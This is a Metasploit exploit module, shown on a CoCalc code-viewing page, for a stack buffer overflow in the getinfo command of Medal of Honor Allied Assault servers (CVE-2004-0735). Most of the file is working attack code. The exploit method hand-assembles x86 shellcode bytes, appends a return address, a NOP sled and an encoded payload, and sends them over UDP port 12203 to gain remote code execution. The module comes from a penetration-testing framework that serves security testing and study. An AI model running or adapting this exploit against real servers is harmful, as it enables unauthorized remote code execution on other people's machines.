Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/games/mohaa_getinfo.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Medal of Honor Allied Assault getinfo Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack based buffer overflow in the getinfo

18
          command of Medal Of Honor Allied Assault.

19
        },

20
        'Author' => [ 'Jacopo Cervini' ],

21
        'License' => BSD_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2004-0735'],

24
          [ 'OSVDB', '8061' ],

25
          [ 'EDB', '357'],

26
          [ 'BID', '10743'],

27
        ],

28
        'Privileged' => false,

29
        'Payload' => {

30
          'Space' => 512,

31
          'BadChars' => "\x00",

32
        },

33
        'Platform' => 'win',

34
        'Targets' => [

35
          ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx

36
        ],

37
        'DisclosureDate' => '2004-07-17',

38
        'DefaultTarget' => 0,

39
        'Notes' => {

40
          'Reliability' => UNKNOWN_RELIABILITY,

41
          'Stability' => UNKNOWN_STABILITY,

42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

43
        }

44
      )

45
    )

46


47
    register_options(

48
      [

49
        Opt::RPORT(12203)

50
      ]

51
    )

52
  end

53


54
  def exploit

55
    connect_udp

56


57
    # We should convert this to metasm - Patrick

58
    buf = 'B' * target['Rets'][0]

59
    buf << "\x68\x76\x76\x76\x76" * 9	# PUSH 76767676 x 9

60
    buf << "\x68\x7f\x7f\x7f\x7f"	# PUSH 7F7F7F7F

61
    buf << "\x57"			    	# PUSH EDI

62
    buf << "\x58"			    	# POP EAX

63
    buf << "\x32\x64\x24\x24"	# XOR AH,BYTE PTR SS:[ESP+24]

64
    buf << "\x32\x24\x24"	# XOR AH,BYTE PTR SS:[ESP]

65
    buf << "\x48" * 150	# DEC EAX x 150

66
    buf << "\x50\x50"	# PUSH EAX x 2

67
    buf << "\x53"				# PUSH EBX

68
    buf << "\x58"				# POP EAX

69
    buf << "\x51"				# PUSH ECX

70
    buf << "\x32\x24\x24"	# XOR AH,BYTE PTR SS:[ESP]

71
    buf << "\x6a\x7f"	# PUSH 7F

72
    buf << "\x5e"	# POP ESI

73
    buf << "\x46" * 37				# INC ESI

74
    buf << "\x56" * 10				# PUSH ESI

75
    buf << "\x32\x44\x24\x24"	# XOR AL,BYTE PTR SS:[ESP+24]

76
    buf << "\x49\x49"	# DEC ECX

77
    buf << "\x31\x48\x34"	# XOR DWORD PTR DS:[EAX+34],ECX

78
    buf << "\x58" * 11	# POP EAX

79
    buf << "\x42" * 66

80
    buf << "\x3c" * 4

81
    buf << "\x42" * 48

82
    buf << [ target['Rets'][1] ].pack('V')

83


84
    req = "\xff\xff\xff\xff\x02" + "getinfo " + buf

85
    req << "\r\n\r\n" + make_nops(32) + payload.encoded

86


87
    udp_sock.put(req)

88


89
    handler

90
    disconnect_udp

91
  end

92
end

93


94